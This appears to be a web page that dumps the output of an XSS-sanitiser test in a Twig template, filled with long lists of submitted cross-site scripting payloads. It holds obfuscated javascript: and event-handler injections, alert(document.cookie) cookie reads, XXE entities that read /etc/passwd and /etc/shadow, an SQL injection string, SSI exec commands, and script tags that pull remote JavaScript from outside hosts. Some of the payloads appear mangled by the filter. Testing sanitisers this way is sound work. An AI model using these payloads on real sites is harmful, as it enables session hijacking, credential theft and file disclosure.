href="\xE2\x80\x84javascript:javascript:alert(190)" id="fuzzelement1">test</a> <a href="\xE2\x80\x86javascript:javascript:alert(191)" id="fuzzelement1">test</a> <a href="\xE3\x80\x80javascript:javascript:alert(192)" id="fuzzelement1">test</a> <a href="\x12javascript:javascript:alert(193)" id="fuzzelement1">test</a> <a href="\x0Djavascript:javascript:alert(194)" id="fuzzelement1">test</a> <a href="\x0Ajavascript:javascript:alert(195)" id="fuzzelement1">test</a> <a href="\x0Cjavascript:javascript:alert(196)" id="fuzzelement1">test</a> <a href="\x15javascript:javascript:alert(197)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA8javascript:javascript:alert(198)" id="fuzzelement1">test</a> <a href="\x16javascript:javascript:alert(199)" id="fuzzelement1">test</a> <a href="\x02javascript:javascript:alert(200)" id="fuzzelement1">test</a> <a href="\x1Bjavascript:javascript:alert(201)" id="fuzzelement1">test</a> <a href="\x06javascript:javascript:alert(202)" id="fuzzelement1">test</a> <a href="\xE2\x80\xA9javascript:javascript:alert(203)" id="fuzzelement1">test</a> <a href="\xE2\x80\x85javascript:javascript:alert(204)" id="fuzzelement1">test</a> <a href="\x1Ejavascript:javascript:alert(205)" id="fuzzelement1">test</a> <a href="\xE2\x81\x9Fjavascript:javascript:alert(206)" id="fuzzelement1">test</a> <a href="\x1Cjavascript:javascript:alert(207)" id="fuzzelement1">test</a> <a href="javascript\x00:javascript:alert(208)" id="fuzzelement1">test</a> <a href="javascript\x3A:javascript:alert(209)" id="fuzzelement1">test</a> <a href="javascript\x09:javascript:alert(210)" id="fuzzelement1">test</a> <a href="javascript\x0D:javascript:alert(211)" id="fuzzelement1">test</a> <a href="javascript\x0A:javascript:alert(212)" id="fuzzelement1">test</a> `"'><img src=xxx:x \x0Aonerror=javascript:alert(213)> `"'><img src=xxx:x \x22onerror=javascript:alert(214)> `"'><img src=xxx:x \x0Bonerror=javascript:alert(215)> `"'><img src=xxx:x \x0Donerror=javascript:alert(216)> `"'><img src=xxx:x \x2Fonerror=javascript:alert(217)> `"'><img src=xxx:x \x09onerror=javascript:alert(218)> `"'><img src=xxx:x \x0Conerror=javascript:alert(219)> `"'><img src=xxx:x \x00onerror=javascript:alert(220)> `"'><img src=xxx:x \x27onerror=javascript:alert(221)> `"'><img src=xxx:x \x20onerror=javascript:alert(222)> "`'><script>\x3Bjavascript:alert(223)</script> "`'><script>\x0Djavascript:alert(224)</script> "`'><script>\xEF\xBB\xBFjavascript:alert(225)</script> "`'><script>\xE2\x80\x81javascript:alert(226)</script> "`'><script>\xE2\x80\x84javascript:alert(227)</script> "`'><script>\xE3\x80\x80javascript:alert(228)</script> "`'><script>\x09javascript:alert(229)</script> "`'><script>\xE2\x80\x89javascript:alert(230)</script> "`'><script>\xE2\x80\x85javascript:alert(231)</script> "`'><script>\xE2\x80\x88javascript:alert(232)</script> "`'><script>\x00javascript:alert(233)</script> "`'><script>\xE2\x80\xA8javascript:alert(234)</script> "`'><script>\xE2\x80\x8Ajavascript:alert(235)</script> "`'><script>\xE1\x9A\x80javascript:alert(236)</script> "`'><script>\x0Cjavascript:alert(237)</script> "`'><script>\x2Bjavascript:alert(238)</script> "`'><script>\xF0\x90\x96\x9Ajavascript:alert(239)</script> "`'><script>-javascript:alert(240)</script> "`'><script>\x0Ajavascript:alert(241)</script> "`'><script>\xE2\x80\xAFjavascript:alert(242)</script> "`'><script>\x7Ejavascript:alert(243)</script> "`'><script>\xE2\x80\x87javascript:alert(244)</script> "`'><script>\xE2\x81\x9Fjavascript:alert(245)</script> "`'><script>\xE2\x80\xA9javascript:alert(246)</script> "`'><script>\xC2\x85javascript:alert(247)</script> "`'><script>\xEF\xBF\xAEjavascript:alert(248)</script> "`'><script>\xE2\x80\x83javascript:alert(249)</script> "`'><script>\xE2\x80\x8Bjavascript:alert(250)</script> "`'><script>\xEF\xBF\xBEjavascript:alert(251)</script> "`'><script>\xE2\x80\x80javascript:alert(252)</script> "`'><script>\x21javascript:alert(253)</script> "`'><script>\xE2\x80\x82javascript:alert(254)</script> "`'><script>\xE2\x80\x86javascript:alert(255)</script> "`'><script>\xE1\xA0\x8Ejavascript:alert(256)</script> "`'><script>\x0Bjavascript:alert(257)</script> "`'><script>\x20javascript:alert(258)</script> "`'><script>\xC2\xA0javascript:alert(259)</script> "/><img/onerror=\x0Bjavascript:alert(260)\x0Bsrc=xxx:x /> "/><img/onerror=\x22javascript:alert(261)\x22src=xxx:x /> "/><img/onerror=\x09javascript:alert(262)\x09src=xxx:x /> "/><img/onerror=\x27javascript:alert(263)\x27src=xxx:x /> "/><img/onerror=\x0Ajavascript:alert(264)\x0Asrc=xxx:x /> "/><img/onerror=\x0Cjavascript:alert(265)\x0Csrc=xxx:x /> "/><img/onerror=\x0Djavascript:alert(266)\x0Dsrc=xxx:x /> "/><img/onerror=\x60javascript:alert(267)\x60src=xxx:x /> "/><img/onerror=\x20javascript:alert(268)\x20src=xxx:x /> <script\x2F>javascript:alert(269)</script> <script\x20>javascript:alert(270)</script> <script\x0D>javascript:alert(271)</script> <script\x0A>javascript:alert(272)</script> <script\x0C>javascript:alert(273)</script> <script\x00>javascript:alert(274)</script> <script\x09>javascript:alert(275)</script> `"'><img src=xxx:x onerror\x0B=javascript:alert(276)> `"'><img src=xxx:x onerror\x00=javascript:alert(277)> `"'><img src=xxx:x onerror\x0C=javascript:alert(278)> `"'><img src=xxx:x onerror\x0D=javascript:alert(279)> `"'><img src=xxx:x onerror\x20=javascript:alert(280)> `"'><img src=xxx:x onerror\x0A=javascript:alert(281)> `"'><img src=xxx:x onerror\x09=javascript:alert(282)> <script>javascript:alert(283)<\x00/script> <img src=# onerror\x3D"javascript:alert(284)" > <input onfocus=javascript:alert(285) autofocus> <input onblur=javascript:alert(286) autofocus><input autofocus> <video poster=javascript:javascript:alert(287)// <body onscroll=javascript:alert(288)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus> <form id=test onforminput=javascript:alert(289)><input></form><button form=test onformchange=javascript:alert(290)>X <video><source onerror="javascript:javascript:alert(291)"> <video onerror="javascript:javascript:alert(292)"><source> <form><button formaction="javascript:javascript:alert(293)">X <body oninput=javascript:alert(294)><input autofocus> <math href="javascript:javascript:alert(295)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(296)">CLICKME</maction> </math> <frameset onload=javascript:alert(297)> <table background="javascript:javascript:alert(298)"> <!--<img src="--><img src=x onerror=javascript:alert(299)//"> <comment><img src="</comment><img src=x onerror=javascript:alert(300))//"> <![><img src="]><img src=x onerror=javascript:alert(301)//"> <style><img src="</style><img src=x onerror=javascript:alert(302)//"> <li style=list-style:url() onerror=javascript:alert(303)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(304)></div> <head><base href="javascript://"></head><body><a href="/. /,javascript:alert(305)//#">XXX</a></body> <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(306)</SCRIPT> <OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(307)"></OBJECT> <object data="data:text/html;base64,%(base64)s"> <embed src="data:text/html;base64,%(base64)s"> <b <script>alert(308)</script>0 <div id="div1"><input value="``onmouseover=javascript:alert(309)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script> <x '="foo"><x foo='><img src=x onerror=javascript:alert(310)//'> <embed src="javascript:alert(311)"> <img src="javascript:alert(312)"> <image src="javascript:alert(313)"> <script src="javascript:alert(314)"> <div style=width:1px;filter:glow onfilterchange=javascript:alert(315)>x <? foo="><script>javascript:alert(316)</script>"> <! foo="><script>javascript:alert(317)</script>"> </ foo="><script>javascript:alert(318)</script>"> <? foo="><x foo='?><script>javascript:alert(319)</script>'>"> <! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(320)</script>"> <% foo><x foo="%><script>javascript:alert(321)</script>"> <div id=d><x xmlns="><iframe onload=javascript:alert(322)"></div> <script>d.innerHTML=d.innerHTML</script> <img \x00src=x onerror="alert(323)"> <img \x47src=x onerror="javascript:alert(324)"> <img \x11src=x onerror="javascript:alert(325)"> <img \x12src=x onerror="javascript:alert(326)"> <img\x47src=x onerror="javascript:alert(327)"> <img\x10src=x onerror="javascript:alert(328)"> <img\x13src=x onerror="javascript:alert(329)"> <img\x32src=x onerror="javascript:alert(330)"> <img\x47src=x onerror="javascript:alert(331)"> <img\x11src=x onerror="javascript:alert(332)"> <img \x47src=x onerror="javascript:alert(333)"> <img \x34src=x onerror="javascript:alert(334)"> <img \x39src=x onerror="javascript:alert(335)"> <img \x00src=x onerror="javascript:alert(336)"> <img src\x09=x onerror="javascript:alert(337)"> <img src\x10=x onerror="javascript:alert(338)"> <img src\x13=x onerror="javascript:alert(339)"> <img src\x32=x onerror="javascript:alert(340)"> <img src\x12=x onerror="javascript:alert(341)"> <img src\x11=x onerror="javascript:alert(342)"> <img src\x00=x onerror="javascript:alert(343)"> <img src\x47=x onerror="javascript:alert(344)"> <img src=x\x09onerror="javascript:alert(345)"> <img src=x\x10onerror="javascript:alert(346)"> <img src=x\x11onerror="javascript:alert(347)"> <img src=x\x12onerror="javascript:alert(348)"> <img src=x\x13onerror="javascript:alert(349)"> <img[a][b][c]src[d]=x[e]onerror=[f]"alert(350)"> <img src=x onerror=\x09"javascript:alert(351)"> <img src=x onerror=\x10"javascript:alert(352)"> <img src=x onerror=\x11"javascript:alert(353)"> <img src=x onerror=\x12"javascript:alert(354)"> <img src=x onerror=\x32"javascript:alert(355)"> <img src=x onerror=\x00"javascript:alert(356)"> <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(357)>XXX</a> <img src="x` `<script>javascript:alert(358)</script>"` `> <img src onerror /" '"= alt=javascript:alert(359)//"> <title onpropertychange=javascript:alert(360)></title><title title=> <a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=javascript:alert(361)></a>"> <!--[if]><script>javascript:alert(362)</script --> <!--[if<img src=x onerror=javascript:alert(363)//]> --> <script src="/\%(jscript)s"></script> <script src="\\%(jscript)s"></script> <object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(364)" style="behavior:url(#x);"><param name=postdomevents /></object> <a style="-o-link:'javascript:javascript:alert(365)';-o-link-source:current">X <style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(366)'}{}*{-o-link-source:current}]{color:red};</style> <link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(367))%7d <style>@import "data:,*%7bx:expression(javascript:alert(368))%7D";</style> <a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="javascript:alert(369);">XXX</a></a><a href="javascript:javascript:alert(370)">XXX</a> <style>*[{}@import'%(css)s?]</style>X <div style="font-family:'foo&#10;;color:red;';">XXX <div style="font-family:foo}color=red;">XXX <// style=x:expression\28javascript:alert(371)\29> <style>*{x:expression(javascript:alert(372))}</style> <div style=content:url(%(svg)s)></div> <div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(373));">X <div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script> <div style="background:url(/f#&#127;oo/;color:red/*/foo.jpg);">X <div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X <div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{} </style>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:09:18


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097& #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:07:08


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > < > <META ; <IMG > <INPUT TYPE="BUTTON" action="alert('XSS')"/> ">

    <IFRAME SRC="alert('XSS');"></IFRAME>">123

    ">

    <IFRAME SRC=# ></IFRAME>123

    <IFRAME SRC="alert('XSS');"></IFRAME> <IFRAME SRC=# ></IFRAME> ">

    <IFRAME SRC=# ></IFRAME>123

    "></iframe><iframe frameborder="0%EF%BB%BF ">

    <IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" ></IFRAME>123

    ">

    <iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123

    >

    <IFRAME width="420" height="315" frameborder="0" ></IFRAME>Hover the cursor to the LEFT of this Message

    &ParamHeight=250 <IFRAME width="420" height="315" frameborder="0" ></IFRAME> ">

    <IFRAME SRC="alert('XSS');"></IFRAME>">123

    ">

    <IFRAME SRC=# ></IFRAME>123

    <iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="alert('XSS');"></IFRAME>

    result with twig: {{ xss.xss | escape }}:

    <IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <INPUT TYPE="BUTTON" action="alert('XSS')"/> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> "></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF "><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> "><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> ><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> "><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> "><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> <iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:04:59


    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    <body !#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> < document.vulnerable=true;a=/XSS/\ndocument.vulnerable=true; <input TYPE="IMAGE" SRC="document.vulnerable=true;"> <body BACKGROUND="document.vulnerable=true;"> <body > <bgsound SRC="document.vulnerable=true;">
    <LAYER SRC="document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="document.vulnerable=true;"> <style>li {list-style-image: url("document.vulnerable=true;");</STYLE><UL>
  • XSS 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=document.vulnerable=true;"> <IFRAME SRC="document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="document.vulnerable=true;"></frameset>
    <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> < > > & TYPE="text/javascript" > <style type="text/css">BODY{background:url("document.vulnerable=true")}</style> <!--[if gte IE 4]></object> <XML ID=I><X>]]</xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> <XML ID="xss"><I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"></BODY></html> <? echo('document.vulnerable=true <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>
    <input type="image" dynsrc="document.vulnerable=true;"> <bgsound src="document.vulnerable=true;"> & < rel="stylesheet" href="document.vulnerable=true;"> <iframe src="document.vulnerable=true;"> <meta http-equiv="refresh" content="0;url=document.vulnerable=true;"> <body >
    <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="document.vulnerable=true;"> <style><!--</style> < " ="> & src="" id="X">;</xml>
    [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc">XSS</html> '"--> " SRC="http://www.securitycompass.com/xss.js"> " '' SRC="http://www.securitycompass.com/xss.js">" SRC="http://www.securitycompass.com/xss.js"> [Mozilla] ";>;<;BODY !#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>; <;/script>;<;script>;alert(1)<;/script>; <;/br >; <;scrscriptipt>;alert(1)<;/scrscriptipt>; <;br size=\";&;{alert('XSS')}\";>; perl -e 'print \";<;IMG SRC=java\0script:alert(\";XSS\";)>;\";;' >; out perl -e 'print \";<;SCR\0IPT>;alert(\";XSS\";)<;/SCR\0IPT>;\";;' >; out <~/XSS/*-*/> <~/XSS/*-*/> <~/XSS/*-*/> <~/XSS > "> XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))> XSS STYLE=xss:e/**/xpression(alert('XSS'))> >">& "><STYLE>@import"alert('XSS')";</STYLE> >"'><> >%22%27><> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "> >" '';!--"= < > < > &> <>#115;crip&<>#116;:ale&<>#114;t('XS<>;S')> <>#0000118as&<>#0000099ri&<>#0000112t:&<>#0000097le&<>#0000114t(&<>#0000039XS&<>#0000083')> <>#>#>#> < >'> < >'> &> & version="1.0" encoding="ISO-8859-1"><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]> <?xml version="1.0" encoding="ISO-8859-1"?><![CDATA[' or 1=1 or ''=']]> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file://c:/boot.ini">]>&xee; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>&xee; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/shadow">]>&xee; <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///dev/random">]>&xee; %3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e < > < > <><> > < src=""> < > < > < BACKGROUND="alert('XSS')"> <BODY > <INPUT TYPE="IMAGE" SRC="alert('XSS');"> alert("XSS");//<alert()ipt> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->'> =(◕_◕)= <iframe src="http://ha.ckers.org/scriptlet.html"></iframe> <;/script>;<;script>;alert(1)<;/script>;

    result with twig: {{ xss.xss | escape }}:

    <script>document.vulnerable=true;</script> <img SRC="jav ascript:document.vulnerable=true;"> <img SRC="javascript:document.vulnerable=true;"> <img SRC=" &#14; javascript:document.vulnerable=true;"> <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;> <<SCRIPT>document.vulnerable=true;//<</SCRIPT> <script <B>document.vulnerable=true;</script> <img SRC="javascript:document.vulnerable=true;" <iframe src="javascript:document.vulnerable=true; < <script>a=/XSS/\ndocument.vulnerable=true;</script> \";document.vulnerable=true;;// </title><SCRIPT>document.vulnerable=true;</script> <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;"> <body BACKGROUND="javascript:document.vulnerable=true;"> <body ONLOAD=document.vulnerable=true;> <img DYNSRC="javascript:document.vulnerable=true;"> <img LOWSRC="javascript:document.vulnerable=true;"> <bgsound SRC="javascript:document.vulnerable=true;"> <br SIZE="&{document.vulnerable=true}"> <LAYER SRC="javascript:document.vulnerable=true;"></LAYER> <link REL="stylesheet" HREF="javascript:document.vulnerable=true;"> <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS <img SRC='vbscript:document.vulnerable=true;'> 1script3document.vulnerable=true;1/script3 <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;"> <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;"> <IFRAME SRC="javascript:document.vulnerable=true;"></iframe> <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset> <table BACKGROUND="javascript:document.vulnerable=true;"> <table><TD BACKGROUND="javascript:document.vulnerable=true;"> <div STYLE="background-image: url(javascript:document.vulnerable=true;)"> <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)"> <div STYLE="width: expression(document.vulnerable=true);"> <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style> <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)"> <XSS STYLE="xss:expression(document.vulnerable=true)"> exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'> <style TYPE="text/javascript">document.vulnerable=true;</style> <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a> <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style> <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]--> <base HREF="javascript:document.vulnerable=true;//"> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object> <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span> <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span> <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html> <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?> <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>"> <head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4- <a href="javascript#document.vulnerable=true;"> <div onmouseover="document.vulnerable=true;"> <img src="javascript:document.vulnerable=true;"> <img dynsrc="javascript:document.vulnerable=true;"> <input type="image" dynsrc="javascript:document.vulnerable=true;"> <bgsound src="javascript:document.vulnerable=true;"> &<script>document.vulnerable=true;</script> &{document.vulnerable=true;}; <img src=&{document.vulnerable=true;};> <link rel="stylesheet" href="javascript:document.vulnerable=true;"> <iframe src="vbscript:document.vulnerable=true;"> <img src="mocha:document.vulnerable=true;"> <img src="livescript:document.vulnerable=true;"> <a href="about:<script>document.vulnerable=true;</script>"> <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;"> <body onload="document.vulnerable=true;"> <div style="background-image: url(javascript:document.vulnerable=true;);"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.vulnerable=true;);"> <style type="text/javascript">document.vulnerable=true;</style> <object classid="clsid:..." codebase="javascript:document.vulnerable=true;"> <style><!--</style><script>document.vulnerable=true;//--></script> <<script>document.vulnerable=true;</script> <![<!--]]<script>document.vulnerable=true;//--></script> <!-- -- --><script>document.vulnerable=true;</script><!-- -- --> <img src="blah"onmouseover="document.vulnerable=true;"> <img src="blah>" onmouseover="document.vulnerable=true;"> <xml src="javascript:document.vulnerable=true;"> <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml> <div datafld="b" dataformatas="html" datasrc="#X"></div> [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script> <style>@import'http://www.securitycompass.com/xss.css';</style> <meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet"> <style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style> <OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object> <HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html> <script SRC="http://www.securitycompass.com/xss.jpg"></script> <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"--> <script a=">" SRC="http://www.securitycompass.com/xss.js"></script> <script =">" SRC="http://www.securitycompass.com/xss.js"></script> <script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script> <script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script> <script a=`>` SRC="http://www.securitycompass.com/xss.js"></script> <script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script> <script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script> <div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla] 